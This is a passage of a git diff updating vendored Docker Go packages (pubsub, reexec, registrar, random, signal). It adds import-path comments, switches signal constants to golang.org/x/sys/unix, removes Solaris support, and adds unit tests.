+// The returned channel has a buffer of the specified size.
+func (p *Publisher) SubscribeTopicWithBuffer(topic topicFunc, buffer int) chan interface{} {
+	ch := make(chan interface{}, buffer)
+	p.m.Lock()
+	p.subscribers[ch] = topic
+	p.m.Unlock()
+	return ch
+}
+
 // Evict removes the specified subscriber from receiving any more messages.
 func (p *Publisher) Evict(sub chan interface{}) {
 	p.m.Lock()
diff --git a/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go b/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go
index d6b0a1d59a..98e158248f 100644
--- a/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go
+++ b/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go
@@ -1,4 +1,4 @@
-package pubsub
+package pubsub // import "github.com/docker/docker/pkg/pubsub"
 
 import (
 	"fmt"
@@ -20,7 +20,7 @@ func TestSendToOneSub(t *testing.T) {
 
 func TestSendToMultipleSubs(t *testing.T) {
 	p := NewPublisher(100*time.Millisecond, 10)
-	subs := []chan interface{}{}
+	var subs []chan interface{}
 	subs = append(subs, p.Subscribe(), p.Subscribe(), p.Subscribe())
 
 	p.Publish("hi")
@@ -52,7 +52,7 @@ func TestEvictOneSub(t *testing.T) {
 
 func TestClosePublisher(t *testing.T) {
 	p := NewPublisher(100*time.Millisecond, 10)
-	subs := []chan interface{}{}
+	var subs []chan interface{}
 	subs = append(subs, p.Subscribe(), p.Subscribe(), p.Subscribe())
 	p.Close()
 
@@ -99,7 +99,7 @@ func newTestSubscriber(p *Publisher) *testSubscriber {
 // for testing with -race
 func TestPubSubRace(t *testing.T) {
 	p := NewPublisher(0, 1024)
-	var subs [](*testSubscriber)
+	var subs []*testSubscriber
 	for j := 0; j < 50; j++ {
 		subs = append(subs, newTestSubscriber(p))
 	}
@@ -120,7 +120,7 @@ func BenchmarkPubSub(b *testing.B) {
 	for i := 0; i < b.N; i++ {
 		b.StopTimer()
 		p := NewPublisher(0, 1024)
-		var subs [](*testSubscriber)
+		var subs []*testSubscriber
 		for j := 0; j < 50; j++ {
 			subs = append(subs, newTestSubscriber(p))
 		}
diff --git a/vendor/github.com/docker/docker/pkg/random/random.go b/vendor/github.com/docker/docker/pkg/random/random.go
deleted file mode 100644
index 70de4d1304..0000000000
--- a/vendor/github.com/docker/docker/pkg/random/random.go
+++ /dev/null
@@ -1,71 +0,0 @@
-package random
-
-import (
-	cryptorand "crypto/rand"
-	"io"
-	"math"
-	"math/big"
-	"math/rand"
-	"sync"
-	"time"
-)
-
-// Rand is a global *rand.Rand instance, which initialized with NewSource() source.
-var Rand = rand.New(NewSource())
-
-// Reader is a global, shared instance of a pseudorandom bytes generator.
-// It doesn't consume entropy.
-var Reader io.Reader = &reader{rnd: Rand}
-
-// copypaste from standard math/rand
-type lockedSource struct {
-	lk  sync.Mutex
-	src rand.Source
-}
-
-func (r *lockedSource) Int63() (n int64) {
-	r.lk.Lock()
-	n = r.src.Int63()
-	r.lk.Unlock()
-	return
-}
-
-func (r *lockedSource) Seed(seed int64) {
-	r.lk.Lock()
-	r.src.Seed(seed)
-	r.lk.Unlock()
-}
-
-// NewSource returns math/rand.Source safe for concurrent use and initialized
-// with current unix-nano timestamp
-func NewSource() rand.Source {
-	var seed int64
-	if cryptoseed, err := cryptorand.Int(cryptorand.Reader, big.NewInt(math.MaxInt64)); err != nil {
-		// This should not happen, but worst-case fallback to time-based seed.
-		seed = time.Now().UnixNano()
-	} else {
-		seed = cryptoseed.Int64()
-	}
-	return &lockedSource{
-		src: rand.NewSource(seed),
-	}
-}
-
-type reader struct {
-	rnd *rand.Rand
-}
-
-func (r *reader) Read(b []byte) (int, error) {
-	i := 0
-	for {
-		val := r.rnd.Int63()
-		for val > 0 {
-			b[i] = byte(val)
-			i++
-			if i == len(b) {
-				return i, nil
-			}
-			val >>= 8
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/pkg/random/random_test.go b/vendor/github.com/docker/docker/pkg/random/random_test.go
deleted file mode 100644
index cf405f78cb..0000000000
--- a/vendor/github.com/docker/docker/pkg/random/random_test.go
+++ /dev/null
@@ -1,22 +0,0 @@
-package random
-
-import (
-	"math/rand"
-	"sync"
-	"testing"
-)
-
-// for go test -v -race
-func TestConcurrency(t *testing.T) {
-	rnd := rand.New(NewSource())
-	var wg sync.WaitGroup
-
-	for i := 0; i < 10; i++ {
-		wg.Add(1)
-		go func() {
-			rnd.Int63()
-			wg.Done()
-		}()
-	}
-	wg.Wait()
-}
diff --git a/vendor/github.com/docker/docker/pkg/reexec/README.md b/vendor/github.com/docker/docker/pkg/reexec/README.md
index 45592ce85a..6658f69b69 100644
--- a/vendor/github.com/docker/docker/pkg/reexec/README.md
+++ b/vendor/github.com/docker/docker/pkg/reexec/README.md
@@ -1,4 +1,4 @@
-## reexec
+# reexec
 
 The `reexec` package facilitates the busybox style reexec of the docker binary that we require because 
 of the forking limitations of using Go.  Handlers can be registered with a name and the argv 0 of 
diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_linux.go b/vendor/github.com/docker/docker/pkg/reexec/command_linux.go
index 34ae2a9dcd..efea71794f 100644
--- a/vendor/github.com/docker/docker/pkg/reexec/command_linux.go
+++ b/vendor/github.com/docker/docker/pkg/reexec/command_linux.go
@@ -1,10 +1,10 @@
-// +build linux
-
-package reexec
+package reexec // import "github.com/docker/docker/pkg/reexec"
 
 import (
 	"os/exec"
 	"syscall"
+
+	"golang.org/x/sys/unix"
 )
 
 // Self returns the path to the current process's binary.
@@ -22,7 +22,7 @@ func Command(args ...string) *exec.Cmd {
 		Path: Self(),
 		Args: args,
 		SysProcAttr: &syscall.SysProcAttr{
-			Pdeathsig: syscall.SIGTERM,
+			Pdeathsig: unix.SIGTERM,
 		},
 	}
 }
diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_unix.go b/vendor/github.com/docker/docker/pkg/reexec/command_unix.go
index 778a720e3b..ceaabbdeee 100644
--- a/vendor/github.com/docker/docker/pkg/reexec/command_unix.go
+++ b/vendor/github.com/docker/docker/pkg/reexec/command_unix.go
@@ -1,6 +1,6 @@
-// +build freebsd solaris darwin
+// +build freebsd darwin
 
-package reexec
+package reexec // import "github.com/docker/docker/pkg/reexec"
 
 import (
 	"os/exec"
diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go b/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go
index 76edd82427..09fb4b2d29 100644
--- a/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go
+++ b/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go
@@ -1,12 +1,12 @@
-// +build !linux,!windows,!freebsd,!solaris,!darwin
+// +build !linux,!windows,!freebsd,!darwin
 
-package reexec
+package reexec // import "github.com/docker/docker/pkg/reexec"
 
 import (
 	"os/exec"
 )
 
-// Command is unsupported on operating systems apart from Linux, Windows, Solaris and Darwin.
+// Command is unsupported on operating systems apart from Linux, Windows, and Darwin.
 func Command(args ...string) *exec.Cmd {
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_windows.go b/vendor/github.com/docker/docker/pkg/reexec/command_windows.go
index ca871c4227..438226890f 100644
--- a/vendor/github.com/docker/docker/pkg/reexec/command_windows.go
+++ b/vendor/github.com/docker/docker/pkg/reexec/command_windows.go
@@ -1,6 +1,4 @@
-// +build windows
-
-package reexec
+package reexec // import "github.com/docker/docker/pkg/reexec"
 
 import (
 	"os/exec"
diff --git a/vendor/github.com/docker/docker/pkg/reexec/reexec.go b/vendor/github.com/docker/docker/pkg/reexec/reexec.go
index c56671d919..f8ccddd599 100644
--- a/vendor/github.com/docker/docker/pkg/reexec/reexec.go
+++ b/vendor/github.com/docker/docker/pkg/reexec/reexec.go
@@ -1,4 +1,4 @@
-package reexec
+package reexec // import "github.com/docker/docker/pkg/reexec"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/reexec/reexec_test.go b/vendor/github.com/docker/docker/pkg/reexec/reexec_test.go
new file mode 100644
index 0000000000..44675e7b63
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/reexec/reexec_test.go
@@ -0,0 +1,52 @@
+package reexec // import "github.com/docker/docker/pkg/reexec"
+
+import (
+	"os"
+	"os/exec"
+	"testing"
+
+	"gotest.tools/assert"
+)
+
+func init() {
+	Register("reexec", func() {
+		panic("Return Error")
+	})
+	Init()
+}
+
+func TestRegister(t *testing.T) {
+	defer func() {
+		if r := recover(); r != nil {
+			assert.Equal(t, `reexec func already registered under name "reexec"`, r)
+		}
+	}()
+	Register("reexec", func() {})
+}
+
+func TestCommand(t *testing.T) {
+	cmd := Command("reexec")
+	w, err := cmd.StdinPipe()
+	assert.NilError(t, err, "Error on pipe creation: %v", err)
+	defer w.Close()
+
+	err = cmd.Start()
+	assert.NilError(t, err, "Error on re-exec cmd: %v", err)
+	err = cmd.Wait()
+	assert.Error(t, err, "exit status 2")
+}
+
+func TestNaiveSelf(t *testing.T) {
+	if os.Getenv("TEST_CHECK") == "1" {
+		os.Exit(2)
+	}
+	cmd := exec.Command(naiveSelf(), "-test.run=TestNaiveSelf")
+	cmd.Env = append(os.Environ(), "TEST_CHECK=1")
+	err := cmd.Start()
+	assert.NilError(t, err, "Unable to start command")
+	err = cmd.Wait()
+	assert.Error(t, err, "exit status 2")
+
+	os.Args[0] = "mkdir"
+	assert.Check(t, naiveSelf() != os.Args[0])
+}
diff --git a/vendor/github.com/docker/docker/pkg/registrar/registrar.go b/vendor/github.com/docker/docker/pkg/registrar/registrar.go
deleted file mode 100644
index 1e75ee995b..0000000000
--- a/vendor/github.com/docker/docker/pkg/registrar/registrar.go
+++ /dev/null
@@ -1,127 +0,0 @@
-// Package registrar provides name registration. It reserves a name to a given key.
-package registrar
-
-import (
-	"errors"
-	"sync"
-)
-
-var (
-	// ErrNameReserved is an error which is returned when a name is requested to be reserved that already is reserved
-	ErrNameReserved = errors.New("name is reserved")
-	// ErrNameNotReserved is an error which is returned when trying to find a name that is not reserved
-	ErrNameNotReserved = errors.New("name is not reserved")
-	// ErrNoSuchKey is returned when trying to find the names for a key which is not known
-	ErrNoSuchKey = errors.New("provided key does not exist")
-)
-
-// Registrar stores indexes a list of keys and their registered names as well as indexes names and the key that they are registered to
-// Names must be unique.
-// Registrar is safe for concurrent access.
-type Registrar struct {
-	idx   map[string][]string
-	names map[string]string
-	mu    sync.Mutex
-}
-
-// NewRegistrar creates a new Registrar with the an empty index
-func NewRegistrar() *Registrar {
-	return &Registrar{
-		idx:   make(map[string][]string),
-		names: make(map[string]string),
-	}
-}
-
-// Reserve registers a key to a name
-// Reserve is idempotent
-// Attempting to reserve a key to a name that already exists results in an `ErrNameReserved`
-// A name reservation is globally unique
-func (r *Registrar) Reserve(name, key string) error {
-	r.mu.Lock()
-	defer r.mu.Unlock()
-
-	if k, exists := r.names[name]; exists {
-		if k != key {
-			return ErrNameReserved
-		}
-		return nil
-	}
-
-	r.idx[key] = append(r.idx[key], name)
-	r.names[name] = key
-	return nil
-}
-
-// Release releases the reserved name
-// Once released, a name can be reserved again
-func (r *Registrar) Release(name string) {
-	r.mu.Lock()
-	defer r.mu.Unlock()
-
-	key, exists := r.names[name]
-	if !exists {
-		return
-	}
-
-	for i, n := range r.idx[key] {
-		if n != name {
-			continue
-		}
-		r.idx[key] = append(r.idx[key][:i], r.idx[key][i+1:]...)
-		break
-	}
-
-	delete(r.names, name)
-
-	if len(r.idx[key]) == 0 {
-		delete(r.idx, key)
-	}
-}
-
-// Delete removes all reservations for the passed in key.
-// All names reserved to this key are released.
-func (r *Registrar) Delete(key string) {
-	r.mu.Lock()
-	for _, name := range r.idx[key] {
-		delete(r.names, name)
-	}
-	delete(r.idx, key)
-	r.mu.Unlock()
-}
-
-// GetNames lists all the reserved names for the given key
-func (r *Registrar) GetNames(key string) ([]string, error) {
-	r.mu.Lock()
-	defer r.mu.Unlock()
-
-	names, exists := r.idx[key]
-	if !exists {
-		return nil, ErrNoSuchKey
-	}
-	return names, nil
-}
-
-// Get returns the key that the passed in name is reserved to
-func (r *Registrar) Get(name string) (string, error) {
-	r.mu.Lock()
-	key, exists := r.names[name]
-	r.mu.Unlock()
-
-	if !exists {
-		return "", ErrNameNotReserved
-	}
-	return key, nil
-}
-
-// GetAll returns all registered names
-func (r *Registrar) GetAll() map[string][]string {
-	out := make(map[string][]string)
-
-	r.mu.Lock()
-	// copy index into out
-	for id, names := range r.idx {
-		out[id] = names
-	}
-	r.mu.Unlock()
-	return out
-}
diff --git a/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go b/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go
deleted file mode 100644
index 0c1ef312ae..0000000000
--- a/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go
+++ /dev/null
@@ -1,119 +0,0 @@
-package registrar
-
-import (
-	"reflect"
-	"testing"
-)
-
-func TestReserve(t *testing.T) {
-	r := NewRegistrar()
-
-	obj := "test1"
-	if err := r.Reserve("test", obj); err != nil {
-		t.Fatal(err)
-	}
-
-	if err := r.Reserve("test", obj); err != nil {
-		t.Fatal(err)
-	}
-
-	obj2 := "test2"
-	err := r.Reserve("test", obj2)
-	if err == nil {
-		t.Fatalf("expected error when reserving an already reserved name to another object")
-	}
-	if err != ErrNameReserved {
-		t.Fatal("expected `ErrNameReserved` error when attempting to reserve an already reserved name")
-	}
-}
-
-func TestRelease(t *testing.T) {
-	r := NewRegistrar()
-	obj := "testing"
-
-	if err := r.Reserve("test", obj); err != nil {
-		t.Fatal(err)
-	}
-	r.Release("test")
-	r.Release("test") // Ensure there is no panic here
-
-	if err := r.Reserve("test", obj); err != nil {
-		t.Fatal(err)
-	}
-}
-
-func TestGetNames(t *testing.T) {
-	r := NewRegistrar()
-	obj := "testing"
-	names := []string{"test1", "test2"}
-
-	for _, name := range names {
-		if err := r.Reserve(name, obj); err != nil {
-			t.Fatal(err)
-		}
-	}
-	r.Reserve("test3", "other")
-
-	names2, err := r.GetNames(obj)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if !reflect.DeepEqual(names, names2) {
-		t.Fatalf("Exepected: %v, Got: %v", names, names2)
-	}
-}
-
-func TestDelete(t *testing.T) {
-	r := NewRegistrar()
-	obj := "testing"
-	names := []string{"test1", "test2"}
-	for _, name := range names {
-		if err := r.Reserve(name, obj); err != nil {
-			t.Fatal(err)
-		}
-	}
-
-	r.Reserve("test3", "other")
-	r.Delete(obj)
-
-	_, err := r.GetNames(obj)
-	if err == nil {
-		t.Fatal("expected error getting names for deleted key")
-	}
-
-	if err != ErrNoSuchKey {
-		t.Fatal("expected `ErrNoSuchKey`")
-	}
-}
-
-func TestGet(t *testing.T) {
-	r := NewRegistrar()
-	obj := "testing"
-	name := "test"
-
-	_, err := r.Get(name)
-	if err == nil {
-		t.Fatal("expected error when key does not exist")
-	}
-	if err != ErrNameNotReserved {
-		t.Fatal(err)
-	}
-
-	if err := r.Reserve(name, obj); err != nil {
-		t.Fatal(err)
-	}
-
-	if _, err = r.Get(name); err != nil {
-		t.Fatal(err)
-	}
-
-	r.Delete(obj)
-	_, err = r.Get(name)
-	if err == nil {
-		t.Fatal("expected error when key does not exist")
-	}
-	if err != ErrNameNotReserved {
-		t.Fatal(err)
-	}
-}
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal.go b/vendor/github.com/docker/docker/pkg/signal/signal.go
index 68bb77cf58..88ef7b5ea2 100644
--- a/vendor/github.com/docker/docker/pkg/signal/signal.go
+++ b/vendor/github.com/docker/docker/pkg/signal/signal.go
@@ -1,6 +1,6 @@
 // Package signal provides helper functions for dealing with signals across
 // various operating systems.
-package signal
+package signal // import "github.com/docker/docker/pkg/signal"
 
 import (
 	"fmt"
@@ -13,7 +13,7 @@ import (
 
 // CatchAll catches all signals and relays them to the specified channel.
 func CatchAll(sigc chan os.Signal) {
-	handledSigs := []os.Signal{}
+	var handledSigs []os.Signal
 	for _, s := range SignalMap {
 		handledSigs = append(handledSigs, s)
 	}
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go b/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go
index 946de87e94..ee5501e3d9 100644
--- a/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go
@@ -1,4 +1,4 @@
-package signal
+package signal // import "github.com/docker/docker/pkg/signal"
 
 import (
 	"syscall"
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go b/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go
index 6b9569bb75..764f90e264 100644
--- a/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go
@@ -1,4 +1,4 @@
-package signal
+package signal // import "github.com/docker/docker/pkg/signal"
 
 import (
 	"syscall"
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_linux.go b/vendor/github.com/docker/docker/pkg/signal/signal_linux.go
index d418cbe9e3..caed97c963 100644
--- a/vendor/github.com/docker/docker/pkg/signal/signal_linux.go
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_linux.go
@@ -1,7 +1,9 @@
-package signal
+package signal // import "github.com/docker/docker/pkg/signal"
 
 import (
 	"syscall"
+
+	"golang.org/x/sys/unix"
 )
 
 const (
@@ -11,41 +13,40 @@ const (
 
 // SignalMap is a map of Linux signals.
 var SignalMap = map[string]syscall.Signal{
-	"ABRT":     syscall.SIGABRT,
-	"ALRM":     syscall.SIGALRM,
-	"BUS":      syscall.SIGBUS,
-	"CHLD":     syscall.SIGCHLD,
-	"CLD":      syscall.SIGCLD,
-	"CONT":     syscall.SIGCONT,
-	"FPE":      syscall.SIGFPE,
-	"HUP":      syscall.SIGHUP,
-	"ILL":      syscall.SIGILL,
-	"INT":      syscall.SIGINT,
-	"IO":       syscall.SIGIO,
-	"IOT":      syscall.SIGIOT,
-	"KILL":     syscall.SIGKILL,
-	"PIPE":     syscall.SIGPIPE,
-	"POLL":     syscall.SIGPOLL,
-	"PROF":     syscall.SIGPROF,
-	"PWR":      syscall.SIGPWR,
-	"QUIT":     syscall.SIGQUIT,
-	"SEGV":     syscall.SIGSEGV,
-	"STKFLT":   syscall.SIGSTKFLT,
-	"STOP":     syscall.SIGSTOP,
-	"SYS":      syscall.SIGSYS,
-	"TERM":     syscall.SIGTERM,
-	"TRAP":     syscall.SIGTRAP,
-	"TSTP":     syscall.SIGTSTP,
-	"TTIN":     syscall.SIGTTIN,
-	"TTOU":     syscall.SIGTTOU,
-	"UNUSED":   syscall.SIGUNUSED,
-	"URG":      syscall.SIGURG,
-	"USR1":     syscall.SIGUSR1,
-	"USR2":     syscall.SIGUSR2,
-	"VTALRM":   syscall.SIGVTALRM,
-	"WINCH":    syscall.SIGWINCH,
-	"XCPU":     syscall.SIGXCPU,
-	"XFSZ":     syscall.SIGXFSZ,
+	"ABRT":     unix.SIGABRT,
+	"ALRM":     unix.SIGALRM,
+	"BUS":      unix.SIGBUS,
+	"CHLD":     unix.SIGCHLD,
+	"CLD":      unix.SIGCLD,
+	"CONT":     unix.SIGCONT,
+	"FPE":      unix.SIGFPE,
+	"HUP":      unix.SIGHUP,
+	"ILL":      unix.SIGILL,
+	"INT":      unix.SIGINT,
+	"IO":       unix.SIGIO,
+	"IOT":      unix.SIGIOT,
+	"KILL":     unix.SIGKILL,
+	"PIPE":     unix.SIGPIPE,
+	"POLL":     unix.SIGPOLL,
+	"PROF":     unix.SIGPROF,
+	"PWR":      unix.SIGPWR,
+	"QUIT":     unix.SIGQUIT,
+	"SEGV":     unix.SIGSEGV,
+	"STKFLT":   unix.SIGSTKFLT,
+	"STOP":     unix.SIGSTOP,
+	"SYS":      unix.SIGSYS,
+	"TERM":     unix.SIGTERM,
+	"TRAP":     unix.SIGTRAP,
+	"TSTP":     unix.SIGTSTP,
+	"TTIN":     unix.SIGTTIN,
+	"TTOU":     unix.SIGTTOU,
+	"URG":      unix.SIGURG,
+	"USR1":     unix.SIGUSR1,
+	"USR2":     unix.SIGUSR2,
+	"VTALRM":   unix.SIGVTALRM,
+	"WINCH":    unix.SIGWINCH,
+	"XCPU":     unix.SIGXCPU,
+	"XFSZ":     unix.SIGXFSZ,
 	"RTMIN":    sigrtmin,
 	"RTMIN+1":  sigrtmin + 1,
 	"RTMIN+2":  sigrtmin + 2,
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_linux_test.go b/vendor/github.com/docker/docker/pkg/signal/signal_linux_test.go
new file mode 100644
index 0000000000..9a021e2164
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_linux_test.go
@@ -0,0 +1,59 @@
+// +build darwin linux
+
+package signal // import "github.com/docker/docker/pkg/signal"
+
+import (
+	"os"
+	"syscall"
+	"testing"
+	"time"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestCatchAll(t *testing.T) {
+	sigs := make(chan os.Signal, 1)
+	CatchAll(sigs)
+	defer StopCatch(sigs)
+
+	listOfSignals := map[string]string{
+		"CONT": syscall.SIGCONT.String(),
+		"HUP":  syscall.SIGHUP.String(),
+		"CHLD": syscall.SIGCHLD.String(),
+		"ILL":  syscall.SIGILL.String(),
+		"FPE":  syscall.SIGFPE.String(),
+		"CLD":  syscall.SIGCLD.String(),
+	}
+
+	for sigStr := range listOfSignals {
+		signal, ok := SignalMap[sigStr]
+		if ok {
+			go func() {
+				time.Sleep(1 * time.Millisecond)
+				syscall.Kill(syscall.Getpid(), signal)
+			}()
+
+			s := <-sigs
+			assert.Check(t, is.Equal(s.String(), signal.String()))
+		}
+
+	}
+}
+
+func TestStopCatch(t *testing.T) {
+	signal := SignalMap["HUP"]
+	channel := make(chan os.Signal, 1)
+	CatchAll(channel)
+	go func() {
+
+		time.Sleep(1 * time.Millisecond)
+		syscall.Kill(syscall.Getpid(), signal)
+	}()
+	signalString := <-channel
+	assert.Check(t, is.Equal(signalString.String(), signal.String()))
+
+	StopCatch(channel)
+	_, ok := <-channel
+	assert.Check(t, is.Equal(ok, false))
+}
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go b/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go
deleted file mode 100644
index 89576b9e3b..0000000000
--- a/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go
+++ /dev/null
@@ -1,42 +0,0 @@
-package signal
-
-import (
-	"syscall"
-)
-
-// SignalMap is a map of Solaris signals.
-// SIGINFO and SIGTHR not defined for Solaris
-var SignalMap = map[string]syscall.Signal{
-	"ABRT":   syscall.SIGABRT,
-	"ALRM":   syscall.SIGALRM,
-	"BUF":    syscall.SIGBUS,
-	"CHLD":   syscall.SIGCHLD,
-	"CONT":   syscall.SIGCONT,
-	"EMT":    syscall.SIGEMT,
-	"FPE":    syscall.SIGFPE,
-	"HUP":    syscall.SIGHUP,
-	"ILL":    syscall.SIGILL,
-	"INT":    syscall.SIGINT,
-	"IO":     syscall.SIGIO,
-	"IOT":    syscall.SIGIOT,
-	"KILL":   syscall.SIGKILL,
-	"LWP":    syscall.SIGLWP,
-	"PIPE":   syscall.SIGPIPE,
-	"PROF":   syscall.SIGPROF,
-	"QUIT":   syscall.SIGQUIT,
-	"SEGV":   syscall.SIGSEGV,
-	"STOP":   syscall.SIGSTOP,
-	"SYS":    syscall.SIGSYS,
-	"TERM":   syscall.SIGTERM,
-	"TRAP":   syscall.SIGTRAP,
-	"TSTP":   syscall.SIGTSTP,
-	"TTIN":   syscall.SIGTTIN,
-	"TTOU":   syscall.SIGTTOU,
-	"URG":    syscall.SIGURG,
-	"USR1":   syscall.SIGUSR1,
-	"USR2":   syscall.SIGUSR2,
-	"VTALRM": syscall.SIGVTALRM,
-	"WINCH":  syscall.SIGWINCH,
-	"XCPU":   syscall.SIGXCPU,
-	"XFSZ":   syscall.SIGXFSZ,
-}
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_test.go b/vendor/github.com/docker/docker/pkg/signal/signal_test.go
new file mode 100644
index 0000000000..0bfcf6ce44
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_test.go
@@ -0,0 +1,34 @@
+package signal // import "github.com/docker/docker/pkg/signal"
+
+import (
+	"syscall"
+	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestParseSignal(t *testing.T) {
+	_, checkAtoiError := ParseSignal("0")
+	assert.Check(t, is.Error(checkAtoiError, "Invalid signal: 0"))
+
+	_, error := ParseSignal("SIG")
+	assert.Check(t, is.Error(error, "Invalid signal: SIG"))
+
+	for sigStr := range SignalMap {
+		responseSignal, error := ParseSignal(sigStr)
+		assert.Check(t, error)
+		signal := SignalMap[sigStr]
+		assert.Check(t, is.DeepEqual(signal, responseSignal))
+	}
+}
+
+func TestValidSignalForPlatform(t *testing.T) {
+	isValidSignal := ValidSignalForPlatform(syscall.Signal(0))
+	assert.Check(t, is.Equal(false, isValidSignal))
+
+	for _, sigN := range SignalMap {
+		isValidSignal = ValidSignalForPlatform(syscall.Signal(sigN))
+		assert.Check(t, is.Equal(true, isValidSignal))
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_unix.go b/vendor/github.com/docker/docker/pkg/signal/signal_unix.go
index 5d058fd56b..a2aa4248fa 100644
--- a/vendor/github.com/docker/docker/pkg/signal/signal_unix.go
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package signal
+package signal // import "github.com/docker/docker/pkg/signal"
 
 import (
 	"syscall"
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go b/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go
index c592d37dfe..1fd25a83c6 100644
--- a/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go
@@ -1,6 +1,6 @@
-// +build !linux,!darwin,!freebsd,!windows,!solaris
+// +build !linux,!darwin,!freebsd,!windows
 
-package signal
+package signal // import "github.com/docker/docker/pkg/signal"
 
 import (
 	"syscall"
diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_windows.go b/vendor/github.com/docker/docker/pkg/signal/signal_windows.go
index 440f2700e2..65752f24aa 100644
--- a/vendor/github.com/docker/docker/pkg/signal/signal_windows.go
+++ b/vendor/github.com/docker/docker/pkg/signal/signal_windows.go
@@ -1,6 +1,4 @@
-// +build windows
-
-package signal
+package signal // import "github.com/docker/docker/pkg/signal"
 
 import (
 	"syscall"
diff --git a/vendor/github.com/docker/docker/pkg/signal/testfiles/main.go b/vendor/github.com/docker/docker/pkg/signal/testfiles/main.go
new file mode 100644
index 0000000000..e56854c7c3
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/signal/testfiles/main.go
@@ -0,0 +1,43 @@
+package main
+
+import (
+	"os"
+	"syscall"
+	"time"
+
+	"github.com/docker/docker/pkg/signal"
+	"github.com/sirupsen/logrus"
+)
+
+func main() {
+	sigmap := map[string]os.Signal{
+		"TERM": syscall.SIGTERM,
+		"QUIT": syscall.SIGQUIT,
+		"INT":  os.Interrupt,
+	}
+	signal.Trap(func() {
+		time.Sleep(time.Second)
+		os.Exit(99)
+	}, logrus.StandardLogger())
+	go func() {
+		p, err := os.FindProcess(os.Getpid())
+		if err != nil {
+			panic(err)
+		}
+		s := os.Getenv("SIGNAL_TYPE")
+		multiple := os.Getenv("IF_MULTIPLE")
+		switch s {
+		case "TERM", "INT":
+			if multiple == "1" {
+				for {
+					p.Signal(sigmap[s])
+				}
+			} else {
+				p.Signal(sigmap[s])
+			}
+		case "QUIT":
+			p.Signal(sigmap[s])
+		}
+	}()
+	time.Sleep(2 * time.Second)
+}
diff --git a/vendor/github.com/docker/docker/pkg/signal/trap.go b/vendor/github.com/docker/docker/pkg/signal/trap.go
index 638a1ab66c..2a6e69fb50 100644
--- a/vendor/github.com/docker/docker/pkg/signal/trap.go
+++ b/vendor/github.com/docker/docker/pkg/signal/trap.go
@@ -1,4 +1,4 @@
-package signal
+package signal // import "github.com/docker/docker/pkg/signal"
 
 import (
 	"fmt"
@@ -11,7 +11,6 @@ import (
 	"syscall"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/pkg/errors"
 )
 
@@ -27,7 +26,9 @@ import (
 //   the docker daemon is not restarted and also running under systemd.
 //   Fixes https://github.com/docker/docker/issues/19728
 //
-func Trap(cleanup func()) {
+func Trap(cleanup func(), logger interface {
+	Info(args ...interface{})
+}) {
 	c := make(chan os.Signal, 1)
 	// we will handle INT, TERM, QUIT, SIGPIPE here
 	signals := []os.Signal{os.Interrupt, syscall.SIGTERM, syscall.SIGQUIT, syscall.SIGPIPE}
@@ -40,7 +41,7 @@ func Trap(cleanup func()) {
 			}
 
 			go func(sig os.Signal) {
-				logrus.Infof("Processing signal '%v'", sig)
+				logger.Info(fmt.Sprintf("Processing signal '%v'", sig))
 				switch sig {
 				case os.Interrupt, syscall.SIGTERM:
 					if atomic.LoadUint32(&interruptCount) < 3 {
@@ -54,11 +55,11 @@ func Trap(cleanup func()) {
 						}
 					} else {
 						// 3 SIGTERM/INT signals received; force exit without cleanup
-						logrus.Info("Forcing docker daemon shutdown without cleanup; 3 interrupts received")
+						logger.Info("Forcing docker daemon shutdown without cleanup; 3 interrupts received")
 					}
 				case syscall.SIGQUIT:
 					DumpStacks("")
-					logrus.Info("Forcing docker daemon shutdown without cleanup on SIGQUIT")
+					logger.Info("Forcing docker daemon shutdown without cleanup on SIGQUIT")
 				}
 				//for the SIGINT/TERM, and SIGQUIT non-clean shutdown case, exit with 128 + signal #
 				os.Exit(128 + int(sig.(syscall.Signal)))
